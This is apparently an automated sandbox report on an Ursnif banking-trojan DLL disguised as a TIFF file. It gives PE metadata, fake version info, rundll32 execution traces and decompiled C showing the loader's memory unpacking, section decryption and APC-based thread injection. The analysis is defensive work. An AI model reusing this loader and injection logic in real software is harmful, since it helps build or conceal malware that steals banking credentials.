IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc5f20	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9b000	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x997af	0x99800	False	0.488934942488	data	6.50079371898	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9b000	0x2d5aa	0x2d600	False	0.326892863292	data	4.74980452387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc9000	0x1efdc	0xe00	False	0.209821428571	data	3.01039741419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe8000	0x3a0	0x400	False	0.404296875	data	3.03375733203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe9000	0x51e0	0x5200	False	0.770293445122	data	6.74990882481	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xe8060	0x340	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileW, GetWindowsDirectoryW, ReadFile, GetConsoleMode, OpenMutexW, CloseHandle, GetFileSize, DeleteCriticalSection, ReadConsoleW, VirtualProtectEx, GetConsoleCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, SetStdHandle, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, EncodePointer, FreeLibrary, LoadLibraryExW, GetModuleFileNameW, GetModuleHandleExW, ExitProcess, HeapAlloc, HeapValidate, GetSystemInfo, GetCurrentThread, GetStdHandle, GetFileType, WriteFile, OutputDebugStringW, WriteConsoleW, SetConsoleCtrlHandler, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, DecodePointer
UxTheme.dll	CloseThemeData
AVIFIL32.dll	AVIFileGetStream, AVIFileOpenW, AVIFileExit, AVIFileInit, AVIFileEndRecord
TAPI32.dll	lineRedirectW, lineInitialize, lineHold, lineShutdown, lineTranslateAddressW

Exports

Name	Ordinal	Address
Hundredpopulate@@8	1	0x1030208
Mark@@12	2	0x10303fe
Seefit@@8	3	0x103046c

Version Infos

Description	Data
LegalCopyright	Dad plan Corporation. All rights reserved
InternalName	Team Lonesell
FileVersion	7.2.6.201
CompanyName	Dad plan Corporation
These	95
ProductName	Dad plan Fair fell
ProductVersion	7.2.6.201
FileDescription	Dad plan Fair fell
OriginalFilename	fall.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 980 Parent PID: 5752

General

Start time:	11:02:22
Start date:	11/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll'
Imagebase:	0x11b0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4312 Parent PID: 980

General

Start time:	11:02:22
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5824 Parent PID: 980

General

Start time:	11:02:22
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8
Imagebase:	0x50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1752 Parent PID: 4312

General

Start time:	11:02:22
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Imagebase:	0x50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.590568897.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4404 Parent PID: 980

General

Start time:	11:02:26
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12
Imagebase:	0x50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1700 Parent PID: 980

General

Start time:	11:02:29
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8
Imagebase:	0x50000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5444 Parent PID: 792

General

Start time:	11:04:30
Start date:	11/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 980 Parent PID: 5752 loaddll32.exeCOMMON

Executed Functions

Function 6E22C536, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000009EF,00003000,00000040,000009EF,-_^), ref: 6E22C5F0
VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,6E22BFEF), ref: 6E22C627
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E22C687
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E22C6BD
VirtualProtect.KERNEL32(6E160000,00000000,00000004,6E22C515), ref: 6E22C7C2
VirtualProtect.KERNEL32(6E160000,00001000,00000004,6E22C515), ref: 6E22C7E9
VirtualProtect.KERNEL32(00000000,?,00000002,6E22C515), ref: 6E22C8B6
VirtualProtect.KERNEL32(00000000,?,00000002,6E22C515,?), ref: 6E22C90C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E22C928

Strings

-_^, xrefs: 6E22C5E4

Memory Dump Source

Source File: 00000000.00000002.591194947.000000006E22B000.00000040.00020000.sdmp, Offset: 6E22B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID: -_^
API String ID: 2574235972-2116301257
Opcode ID: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction ID: b44ab9a4aa17511f86eb7497d35ca5685a53d0f491fa52a9d5061dcb307d2a9d
Opcode Fuzzy Hash: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction Fuzzy Hash: E7D18976920641DFDB108F54CC91B613BA7FF88B10B0A25A6ED0A9F39ED771E811CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E161237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E161237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E161CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E1610E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E16179C(E6E161424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E161BE5(_t44,  &_a4) != 0) {
					 *0x6e164138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6e164138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E161CC8(_t48 + _t14);
				 *0x6e164138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6E16133D(_t43);
				goto L11;
			}

0x6e16123e
0x6e161245
0x6e16124a
0x6e16133a
0x6e16133a
0x6e161251
0x6e161255
0x6e16125b
0x6e161269
0x6e16126a
0x6e16126d
0x6e161270
0x6e161279
0x6e16127c
0x6e161282
0x6e161285
0x6e16128c
0x6e161337
0x00000000
0x6e161337
0x6e161296
0x6e1612e7
0x6e1612e7
0x6e1612fd
0x6e161302
0x6e16132a
0x6e161304
0x6e161307
0x6e16130d
0x6e161312
0x6e161319
0x6e161319
0x6e161320
0x6e161320
0x6e16132d
0x6e161333
0x6e161335
0x6e161335
0x00000000
0x6e161333
0x6e1612a3
0x6e1612e1
0x00000000
0x6e1612e1
0x6e1612a5
0x6e1612a8
0x6e1612b3
0x6e1612b7
0x6e1612d9
0x6e1612d9
0x00000000
0x6e1612d9
0x6e1612b9
0x6e1612be
0x6e1612c3
0x6e1612ca
0x00000000
0x00000000
0x6e1612cf
0x6e1612d2
0x00000000

APIs

Part of subcall function 6E161CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E161243,747863F0), ref: 6E161CEC
Part of subcall function 6E161CDD: GetVersion.KERNEL32 ref: 6E161CFB
Part of subcall function 6E161CDD: GetCurrentProcessId.KERNEL32 ref: 6E161D17
Part of subcall function 6E161CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E161D30

GetSystemTime.KERNEL32(?,00000000,747863F0), ref: 6E161255
SwitchToThread.KERNEL32 ref: 6E16125B

Part of subcall function 6E1610E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E16113E
Part of subcall function 6E1610E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E161204

Sleep.KERNELBASE(00000000,00000000), ref: 6E16127C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1612B1
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1612CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E161307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E161319
CloseHandle.KERNEL32(00000000), ref: 6E161320
GetLastError.KERNEL32(?,00000000), ref: 6E161328
GetLastError.KERNEL32 ref: 6E161335

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: e29ca2563dc8e494a6819dbecc49dc6467b9291d7bba88f2262624c525be89af
Instruction ID: a9ba7c71c75ca9121859d07debd5fc0ba70ce45376afe29f88aaac8727c5acf8
Opcode Fuzzy Hash: e29ca2563dc8e494a6819dbecc49dc6467b9291d7bba88f2262624c525be89af
Instruction Fuzzy Hash: 0131D672E00615EBCF41DBE58C488AE77BCEF963207308515E909E3200E730C999FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E161F56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e164108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e16410c;
						if( *0x6e16410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e164118;
								if( *0x6e164118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e16410c);
						}
						HeapDestroy( *0x6e164110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e164108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e164110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e164130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E16179C(E6E16173D, E6E161C6E(_a12, 1, 0x6e164118, _t41));
							 *0x6e16410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e161f59
0x6e161f65
0x6e161f67
0x6e161f6a
0x6e161fe0
0x6e161fe6
0x6e161fe8
0x6e161fea
0x6e161ff0
0x6e161ff2
0x6e161ff7
0x6e161ffa
0x6e162005
0x6e162007
0x00000000
0x00000000
0x6e162009
0x6e16200c
0x6e16200e
0x00000000
0x00000000
0x00000000
0x6e16200e
0x6e162016
0x6e162016
0x6e162022
0x6e162022
0x6e161f6c
0x6e161f6d
0x6e161f8d
0x6e161f93
0x6e161f98
0x6e161f9a
0x6e161fd6
0x6e161fd6
0x6e161f9c
0x6e161fa4
0x6e161fab
0x6e161fb5
0x6e161fc1
0x6e161fc6
0x6e161fcd
0x6e161fd2
0x00000000
0x6e161fd2
0x6e161fcd
0x6e161f9a
0x6e161f6d
0x6e16202f

APIs

InterlockedIncrement.KERNEL32(6E164108), ref: 6E161F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E161F8D

Part of subcall function 6E16179C: CreateThread.KERNELBASE ref: 6E1617B3
Part of subcall function 6E16179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1617C8
Part of subcall function 6E16179C: GetLastError.KERNEL32(00000000), ref: 6E1617D3
Part of subcall function 6E16179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1617DD
Part of subcall function 6E16179C: CloseHandle.KERNEL32(00000000), ref: 6E1617E4
Part of subcall function 6E16179C: SetLastError.KERNEL32(00000000), ref: 6E1617ED

InterlockedDecrement.KERNEL32(6E164108), ref: 6E161FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6E161FFA
CloseHandle.KERNEL32 ref: 6E162016
HeapDestroy.KERNEL32 ref: 6E162022

Strings

Txt, xrefs: 6E161F8D

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Txt
API String ID: 2110400756-4033135041
Opcode ID: 96ea96e041d88275710a71f2e44e79e7a92658588342dd1dea6eda60671a13b1
Instruction ID: 757576b2202a8c8e45d77de18350c36d26b40512f22f3d4e71c5aa765134f1b1
Opcode Fuzzy Hash: 96ea96e041d88275710a71f2e44e79e7a92658588342dd1dea6eda60671a13b1
Instruction Fuzzy Hash: 5821A171601606AFCF809FE9CC9896D3BB8F767761720C425E515D3140D73099AAFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E16179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e164140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1617b3
0x6e1617b9
0x6e1617bd
0x6e1617c8
0x6e1617d0
0x6e1617d9
0x6e1617dd
0x6e1617e4
0x6e1617eb
0x6e1617ed
0x6e1617f3
0x6e1617d0
0x6e1617f7

APIs

CreateThread.KERNELBASE ref: 6E1617B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1617C8
GetLastError.KERNEL32(00000000), ref: 6E1617D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1617DD
CloseHandle.KERNEL32(00000000), ref: 6E1617E4
SetLastError.KERNEL32(00000000), ref: 6E1617ED

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 056382ec3ef532fd9e229aa8f4acd840e3bf329a320b0bf23bde6ae48c04dd68
Instruction ID: e7522d4deaa2fe506122d22f882eee9216578734f98308f544be649f5cc832bc
Opcode Fuzzy Hash: 056382ec3ef532fd9e229aa8f4acd840e3bf329a320b0bf23bde6ae48c04dd68
Instruction Fuzzy Hash: B3F08C32605A21FFDFA25BA08C4CFBFBF68FB9A712F008404F61595140C731881ABBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1610E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1610E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e164130;
				_t50 = E6E161B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e164140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1651a7; // 0x823db7e6
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e164140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e1610ef
0x6e1610ff
0x6e161104
0x6e161109
0x6e16111e
0x6e161125
0x6e16112a
0x6e16113b
0x6e16113e
0x6e161144
0x6e161146
0x6e16114b
0x6e161227
0x6e161151
0x6e161151
0x6e161155
0x6e1611ed
0x6e16115b
0x6e16115c
0x6e161161
0x6e161164
0x6e161167
0x6e161167
0x6e16116e
0x6e161171
0x6e161179
0x6e16117a
0x6e16117b
0x6e161182
0x6e161186
0x6e16118c
0x6e161190
0x6e161192
0x6e161196
0x6e161199
0x6e1611a0
0x6e1611a3
0x6e1611a6
0x6e1611ab
0x6e1611c1
0x6e1611ad
0x6e1611b7
0x6e1611b9
0x6e1611bc
0x6e1611bc
0x6e1611c8
0x6e1611c8
0x6e1611c8
0x6e1611a0
0x6e1611d3
0x6e1611d6
0x6e1611d9
0x6e1611e0
0x6e1611e6
0x6e1611ea
0x6e1611f9
0x6e16120e
0x6e1611fb
0x6e161204
0x6e161209
0x6e16121f
0x6e16121f
0x6e16122e
0x6e161234

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E16113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E161204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E16121F

Strings

May 5 2021, xrefs: 6E161171

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: 9d658d59fc7e4b85581e698d62bbebd9ab6d779a7ea88f6059784bc28315f443
Instruction ID: e175af7a63c025f7d3610f67998c76883fce728db0d5e937520889fd7b62e9c3
Opcode Fuzzy Hash: 9d658d59fc7e4b85581e698d62bbebd9ab6d779a7ea88f6059784bc28315f443
Instruction Fuzzy Hash: 48417E71E0021A9FDF01CFD9C890AEEBBB6BF95310F248129D904B7244C774AA5ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E16173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E16173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E161237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e161746
0x6e16174b
0x6e161759
0x6e16175e
0x6e16175e
0x6e161764
0x6e161769
0x6e16176d
0x6e161771
0x6e161771
0x6e16177b
0x6e161784

APIs

GetCurrentThread.KERNEL32 ref: 6E161740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E16174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E16175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E161771

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 001cab5fd47696d65aa760f2ff56c45ee6b2afd0ab3e8b049e0a6e994626ce8c
Instruction ID: 82e3f280956f99ca7a4b775da1f4a950083471344552f976644612b155fec6e4
Opcode Fuzzy Hash: 001cab5fd47696d65aa760f2ff56c45ee6b2afd0ab3e8b049e0a6e994626ce8c
Instruction Fuzzy Hash: D9E09B313066115BAA416A694C88E7F776CDFD23717118236F521D61D0CB50CC1BA5B5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AA760, Relevance: 1.8, APIs: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E1A6ED0: RtlEnterCriticalSection.NTDLL(?), ref: 6E1A6EDF

RtlAllocateHeap.NTDLL(6E247728,00000000,?), ref: 6E1AA8EF

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: 7d73243a3b6f475e8b5bf2917b37043e3e305ad50db399ee2108a04f2a6c3af5
Instruction ID: fdc2fec2b2f4a8b1d0a58abb71758d952c664ebbd419e74329b7ff02b33a6a10
Opcode Fuzzy Hash: 7d73243a3b6f475e8b5bf2917b37043e3e305ad50db399ee2108a04f2a6c3af5
Instruction Fuzzy Hash: 1FB162B8900609EFDB04CF98D894BAD77B6FB49314F208519E915AB3C0D775A981DFA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

